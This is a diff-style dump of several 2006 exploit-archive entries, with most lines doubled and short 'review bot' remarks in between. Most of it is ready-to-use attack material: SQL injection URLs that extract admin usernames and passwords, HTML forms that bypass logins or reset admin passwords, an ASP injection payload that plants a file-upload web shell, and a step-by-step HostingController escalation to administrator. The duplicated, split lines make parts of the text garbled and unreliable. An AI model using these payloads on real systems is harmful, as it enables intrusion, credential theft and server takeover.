<input type="hidden" name="company" size="30" value="MSN"> <input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir"> <input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32"> <input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00"> <input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345"> <input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL"> <input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678"> <input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321"> <input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1"> <input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7"> <input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br> <br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) --> <!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font> </font>
</form> </form>
</body> </body>
</html> </html>
# milw0rm.com [2006-05-29] # milw0rm.com [2006-05-29]
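Review bot: under `#Solution`, the line `#Change "http://victim.com/nukedit/utilities/register.asp"` is the PoC usage step (repeated below as `Change the form's action in source`), not a mitigation; the only remediation actually stated is `update to new version of nukedit`, so either drop that line or state the real mitigation, which the `#Vulnerability` line already implies (the issue needs `register.asp` enabled). The HTML is also misnested: the `<p>` opened after `your password .` is closed right after the hidden `action` input inside the form, and the `<font>` opened before `<form>` is closed inside it.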

@ -1,79 +1,79 @@
<!-- <!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection # Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann # Author : ajann
# Dork : aspWebLinks 2.0 # Dork : aspWebLinks 2.0
SQL INJECTION: SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
--> -->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title> <title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input <form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden' type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%' name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text' Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43' name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text' New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1" width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1" width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right' Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text' Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text' Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right' or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES' Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES' home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text' items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot' >YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font >NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES' additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO' name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text' items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right' Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit' color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form> value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01] # milw0rm.com [2006-06-01]
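Review bot: the form posting to `links.asp?action=modifyconfigprocess` carries no session identifier or anti-forgery token, so the finding this record documents is that the configuration update, including `txtAdministrativePassword`, is applied without verifying an authenticated administrator; the union-select URL in the header comment likewise shows `linkID` reaching the query unparameterised. The header names neither root cause and gives no affected/fixed version, which a database entry should carry.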


@ -1,8 +1,8 @@
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability # ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded # Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir # Exploited by FarhadKey from kapda.ir
Exploit : Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03] # milw0rm.com [2006-06-03]


@ -1,12 +1,12 @@
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html --> <!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit <html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp"> </center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='"> <input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1"> <input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br> <center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net --> <!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center> <center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form> </form>
</html> </html>
# milw0rm.com [2006-06-06] # milw0rm.com [2006-06-06]
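Review bot: "orginal" in the first comment line should read "original", and the record should name the defect the hidden `UserName` value demonstrates: `adminLogin.asp` concatenates the submitted username into its authentication query, so the fix on the application side is a parameterised lookup with the password verified server-side, not a filter on the input.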


@ -12,5 +12,5 @@
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11] # nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11] # milw0rm.com [2006-06-11]


@ -1,9 +1,9 @@
# There is Sql injection WeBBoA Host Script v1.1 # There is Sql injection WeBBoA Host Script v1.1
# Risk=High # Risk=High
# Exploit: # Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1 http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa # Credit: EntriKa
# milw0rm.com [2006-06-19] # milw0rm.com [2006-06-19]


@ -1,51 +1,51 @@
/*------------------------------------------------ /*------------------------------------------------
IHS Public advisory IHS Public advisory
-------------------------------------------------*/ -------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language. ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports. The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details. It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com http://www.weppos.com
Credit: Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at: The original article can be found at:
http://www.IHSteam.com http://www.IHSteam.com
http://www.hamid.ir/security/ http://www.hamid.ir/security/
Vulnerable Systems: Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection : SQL injection :
Example : Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1 http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14' Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''. Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236 /myasg/pages.asp, line 236
Exploit : Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection : ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code. This can be exploited to inject arbitrary ASP code.
Exploit : Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = " #F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P 
align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian] [m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ... attacker can upload "cmd.asp" with this uploader and ...
Solution: Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 ) use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19] # milw0rm.com [2006-06-19]
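Review bot: the title line misspells "Execution" as "Excution", and the line under the second "Exploit :" heading is rendered twice in this view, with the second copy split across a line break mid-tag and its closing textarea HTML-escaped as `&lt;/textarea&gt;`, so the record does not show one intact copy of that line. The advisory does state the remediation (ASP Stats Generator v2.1.2) and the root cause (`strAsgSknPageBgColour` stored unsanitised into `inc_skin_file.asp`), which is the part a defender needs; the same should be said for the `order` parameter in `pages.asp`, where only the error message is shown.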


@ -1,181 +1,181 @@
Title: An attacker can gain reseller privileges and after that can gain admin privileges Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1 Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2 Solution: Update to Hotfix 3.2
Discover date: 2005,Summer Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006 Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006 Publish date (in security forums): Thu July 06, 2006
------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------
=============================================== ===============================================
1- This code give resadmin session to a user: 1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available. Bug in "hosting/addreseller.asp", No checker is available.
--------------------------------------------------- ---------------------------------------------------
<script> <script>
function siteaction(){ function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3" n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit() window.document.all.frm1.submit()
} }
</script> </script>
<hr><br> <hr><br>
Form1<br> Form1<br>
URL: <input type="text" name=siteact size=70> URL: <input type="text" name=siteact size=70>
<br> <br>
<form name="frm1" method="post" onsubmit="return siteaction()"> <form name="frm1" method="post" onsubmit="return siteaction()">
<table> <table>
<tr> <tr>
<td>reseller</td> <td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td> <td><input type="text" name="reseller" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>loginname</td> <td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td> <td><input type="text" name="loginname" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>Password</td> <td>Password</td>
<td><input type="text" name="Password" value=""></td> <td><input type="text" name="Password" value=""></td>
</tr> </tr>
<tr> <tr>
<td>first_name</td> <td>first_name</td>
<td><input type="text" name="first_name" value=""></td> <td><input type="text" name="first_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>first_name</td> <td>first_name</td>
<td><input type="text" name="first_name" value=""></td> <td><input type="text" name="first_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>last_name</td> <td>last_name</td>
<td><input type="text" name="last_name" value=""></td> <td><input type="text" name="last_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>address</td> <td>address</td>
<td><input type="text" name="address" value=""></td> <td><input type="text" name="address" value=""></td>
</tr> </tr>
<tr> <tr>
<td>city</td> <td>city</td>
<td><input type="text" name="city" value=""></td> <td><input type="text" name="city" value=""></td>
</tr> </tr>
<tr> <tr>
<td>state</td> <td>state</td>
<td><input type="text" name="state" value=""></td> <td><input type="text" name="state" value=""></td>
</tr> </tr>
<tr> <tr>
<td>country</td> <td>country</td>
<td><input type="text" name="country" value=""></td> <td><input type="text" name="country" value=""></td>
</tr> </tr>
<tr> <tr>
<td>email</td> <td>email</td>
<td><input type="text" name="email" value=""></td> <td><input type="text" name="email" value=""></td>
</tr> </tr>
<tr> <tr>
<td>phone</td> <td>phone</td>
<td><input type="text" name="phone" value=""></td> <td><input type="text" name="phone" value=""></td>
</tr> </tr>
<tr> <tr>
<td>fax</td> <td>fax</td>
<td><input type="text" name="fax" value=""></td> <td><input type="text" name="fax" value=""></td>
</tr> </tr>
<tr> <tr>
<td>zip</td> <td>zip</td>
<td><input type="text" name="zip" value=""></td> <td><input type="text" name="zip" value=""></td>
</tr> </tr>
<tr> <tr>
<td>selMonth</td> <td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td> <td><input type="text" name="selMonth" value=""></td>
</tr> </tr>
<tr> <tr>
<td>selYear</td> <td>selYear</td>
<td><input type="text" name="selYear" value=""></td> <td><input type="text" name="selYear" value=""></td>
</tr> </tr>
<tr> <tr>
<td>txtcardno</td> <td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td> <td><input type="text" name="txtcardno" value=""></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step. 2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host. Note: Also by this code, everyone can increase its Credit value then buy every host.
--------------------------------------------------- ---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"> <form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table> <table>
<tr> <tr>
<td>Username:</td> <td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td> <td><input type="text" name="UserName" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>Description:</td> <td>Description:</td>
<td><input type="text" name="Description" value=""></td> <td><input type="text" name="Description" value=""></td>
</tr> </tr>
<tr> <tr>
<td>FullName:</td> <td>FullName:</td>
<td><input type="text" name="FullName" value=""></td> <td><input type="text" name="FullName" value=""></td>
</tr> </tr>
<tr> <tr>
<td>AccountDisabled 1,[blank]:</td> <td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td> <td><input type="text" name="AccountDisabled" value=""></td>
</tr> </tr>
<tr> <tr>
<td>UserChangePassword:</td> <td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td> <td><input type="text" name="UserChangePassword" value=""></td>
</tr> </tr>
<tr> <tr>
<td>PassCheck=TRUE,0:</td> <td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td> <td><input type="text" name="PassCheck" value="0"></td>
</tr> </tr>
<tr> <tr>
<td>New Password:</td> <td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td> <td><input type="text" name="Pass1" value=""></td>
</tr> </tr>
<tr> <tr>
<td>DefaultDiscount%:</td> <td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td> <td><input type="text" name="DefaultDiscount" value="100"></td>
</tr> </tr>
<tr> <tr>
<td>CreditLimit:</td> <td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td> <td><input type="text" name="CreditLimit" value="99999"></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
<hr><br> <hr><br>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it! 3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available: now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp" each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you: below code will help you:
--------------------------------------------------- ---------------------------------------------------
<hr><br> <hr><br>
Form1<br> Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post"> <form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table> <table>
<tr> <tr>
<td>AdName</td> <td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td> <td><input type="text" name="AdName" value="hcadmin"></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
<hr><br> <hr><br>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili") Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net] Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from: Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com) Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com) Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com) Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs: Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl) http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB) http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06] # milw0rm.com [2006-07-06]
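Review bot: the `first_name` row in the step 1 form appears twice in consecutive table rows and one copy should go; "No checker is available" in the step 1 description is vague and should state what is missing, namely that `hosting/addreseller.asp`, `Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit` and `Admin/Check_Password.asp` act on the posted `reseller`, `UserName`/`Pass1` and `AdName` values without a server-side authorisation check on the caller's session, which is what Hotfix 3.2 (the stated solution) must add.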


@ -1,12 +1,12 @@
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality #YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE #Credit:ASIANEAGLE
#Contact:admin@asianeagle.org #Contact:admin@asianeagle.org
#Exploit: #Exploit:
Admin Nick: Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201 http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass: Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201 http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07] # milw0rm.com [2006-08-07]
